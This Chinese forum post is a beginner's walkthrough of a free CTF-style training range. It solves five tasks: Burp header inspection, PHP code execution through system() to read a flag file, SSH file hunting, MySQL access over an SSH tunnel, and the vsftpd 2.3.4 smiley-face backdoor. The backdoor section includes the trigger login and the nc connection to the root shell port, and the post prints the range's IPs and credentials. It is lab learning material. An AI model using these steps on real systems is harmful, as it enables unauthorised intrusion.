前言:
水区的朋友们,年轻就是资本,和我一起学逆向逆天改命吧,我的学习过程全部记录及学习资源:https://www.52pojie.cn/thread-2006536-1-1.html
立帖为证!--------记录学习的点点滴滴
0x1 前言
1.中午吃完后,一个人闲来无事,发现了一个免费的靶场,注册就能玩,难度适中。
2.人一闲下来就容易胡思乱想,好在水区的朋友们都很热情,给出的建议也很真诚,所以找点事情干。
3.废话不多说给出目标网站的网址:aHR0cHM6Ly93d3cud2hobHdhLmNuLw==,注册就能玩
0x2 目标1:BurpSuite抓包练习
1.访问目标网址后就是这样的一个界面:
2.题目也给了提示信息:注意重放数据包查看返回包头寻找flag
3.打开kali,设置本地代理,开burp抓包,右键 → Send to Repeater
GET / HTTP/1.1
Host: 106.54.59.209:8007
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
4.再去Repeater模块点一下send,果然响应头看到了flag信息
HTTP/1.1 200 OK
Date: Fri, 27 Feb 2026 05:27:51 GMT
Server: Apache/2.4.7 (Ubuntu)
this is flag : 27726623fabee80870ab072b70178308.txt
Vary: Accept-Encoding
Content-Length: 2344
Connection: close
Content-Type: text/html; charset=UTF-8
5.访问一下flag到手。
0x3 目标2:PHP代码基础
1.提示信息:1、页面左上角第三个保存按钮就是代码运行测试按钮 2、flag在服务器根目录下面
2.访问目标网址后就是一个运行php代码的编辑框和结果输出框,学过web都知道像这种有命令执行的地方就能尝试执行系统命令(黑窗口)。
3.一个dir \就能判断了,win系统如果是c盘会看到Windows目录,linux系统会看到home,root等,正好也看到了flag文件。
4.使用cat命令就能拿到flag了:flag{2fb92e1e6f9bc193}
system("cat /this_is_flag_d0a10f422fb92e1e6f9bc193a254ef4d.txt");
0x4 目标3:Linux基础命令
1.题目给出提示:
IP:106.54.59.209
SSH端口:2233
SSH用户:test
SSH密码:whhlwa@wuhan
2.百度一下ssh用法:ssh -p 2233 test@106.54.59.209连接,然后输入密码就连上了,看到当前目录下flag文件,cat过去居然只有半截。
┌──(kali㉿kali)-[~]
└─$ ssh -p 2233 test@106.54.59.209
test@106.54.59.209's password:
Welcome to Alpine!
The Alpine Wiki contains a large amount of how-to guides and general
information about administrating Alpine systems.
See <http://wiki.alpinelinux.org>.
You can setup the system with the command: setup-alpine
You may change this message by editing /etc/motd.
a8cdfe55e360:~$ ls -al
total 24
drwxr-sr-x 1 test test 4096 Feb 9 13:24 .
drwxr-xr-x 1 root root 4096 Jan 25 07:20 ..
-rw------- 1 test test 5252 Feb 27 06:19 .ash_history
-rwxr--r-- 1 root root 109 Mar 15 2022 .this_is_flag
a8cdfe55e360:~$ cat .this_is_flag
#九阴真经上卷:
flag{82782fd750080718
tips:九阴真经下卷文件名包含: Jiuyin-Sutra-Volume-2
3.find不会用,找deepseek要了一个搜文件的代码执行,找到了文件的路径。
a8cdfe55e360:~$ find / -name "*Jiuyin-Sutra-Volume-2*" 2>/dev/null
/usr/games/.Jiuyin-Sutra-Volume-2
4.cat一下得到下卷flag,拼成完整flag:flag{82782fd75008071871ad76e3a8b8794d}。
0x5 目标4:端口扫描
1.题目考察:nmap端口扫描练习及经典的笑脸后门利用
服务版本识别:nmap -p 10021 -sV 106.54.59.209
ftp端口10021 对应后门端口16200
ftp端口20021 对应后门端口26200
ftp端口30021 对应后门端口36200
2.nmap扫描后看到ftp端口开着,vsftpd版本2.3.4
┌──(kali㉿kali)-[~]
└─$ nmap -p 10021 -sV 106.54.59.209
Starting Nmap 7.92 ( https://nmap.org ) at 2026-02-27 01:32 EST
Nmap scan report for 106.54.59.209
Host is up (0.026s latency).
PORT STATE SERVICE VERSION
10021/tcp open ftp vsftpd 2.3.4
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.06 seconds
3.使用nc连接ftp服务输入用户名 pp:),密码123456,触发笑脸漏洞(用户名必须包含笑脸)
┌──(kali㉿kali)-[~]
└─$ nc 106.54.59.209 10021
220 (vsFTPd 2.3.4)
user pp:)
331 Please specify the password.
pass 123456
触发漏洞后这里一直停留是挂起状态,说明成功了赶快连接。
4.触发漏洞后,这里根据题目意思要去连接16200,连上后使用ls命令直接在当前目录下看到flag文件了。
┌──(kali㉿kali)-[~]
└─$ nc 106.54.59.209 16200
pwd
/root
ls -al
total 28
drwx------ 1 root root 4096 Jan 25 07:21 .
drwxr-xr-x 1 root root 4096 Jan 25 07:21 ..
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 801 Sep 22 2020 Dockerfile
-rw-r--r-- 1 root root 77 Sep 22 2020 run.sh
-rw-r--r-- 1 root root 39 Mar 16 2022 this_is_flag
cat this_is_flag
flag{ff5c1e67567b60f9086805e3b44e5ccd}
0x6 目标5:Mysql数据库基础
1.题目给出了如下提示信息。
IP:106.54.59.209
SSH端口:2244
SSH账户:test
SSH密码:whhlwa@wuhan
Mysql主机名:mysql
Mysql用户名:test
Mysql密码:test
2.直接ssh过去,连接mysql,怎么连不上,mysql: not found,没有命令行工具咋办。
ssh -p 2244 test@106.54.59.209
-- 连接MySQL数据库
mysql -h mysql -u test -p
3.看一下deepseek给出的解决方案,成功连接MySQL。
# 在本地建立SSH隧道
ssh -L 3307:mysql:3306 test@106.54.59.209 -p 2244
# 输入密码:whhlwa@wuhan
# 新开一个终端,连接本地转发的端口
mysql -h 127.0.0.1 -P 3307 -u test -p
# 输入MySQL密码:test
4.先看一下有哪些数据库,搜索包含flag的表名,最后查表拿到flag。
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| test |
| whhlwa |
+--------------------+
5 rows in set (0.146 sec)
MySQL [(none)]> SELECT
-> TABLE_SCHEMA,
-> TABLE_NAME
-> FROM information_schema.TABLES
-> WHERE TABLE_NAME LIKE '%flag%'
-> OR TABLE_NAME LIKE '%key%'
-> OR TABLE_NAME LIKE '%secret%'
-> OR TABLE_NAME LIKE '%ctf%';
+--------------------+------------------+
| TABLE_SCHEMA | TABLE_NAME |
+--------------------+------------------+
| information_schema | KEY_COLUMN_USAGE |
| mysql | help_keyword |
| whhlwa | flag |
+--------------------+------------------+
3 rows in set (0.081 sec)
MySQL [(none)]> SELECT * FROM whhlwa.flag;
+----------------------------------------+
| flag |
+----------------------------------------+
| 0 |
| flag{0dd93bed6d72ee25d2f75ce3553a4fb7} |
+----------------------------------------+
2 rows in set (0.055 sec)
0x7 总结
1、都是基础题,复习一下web知识了。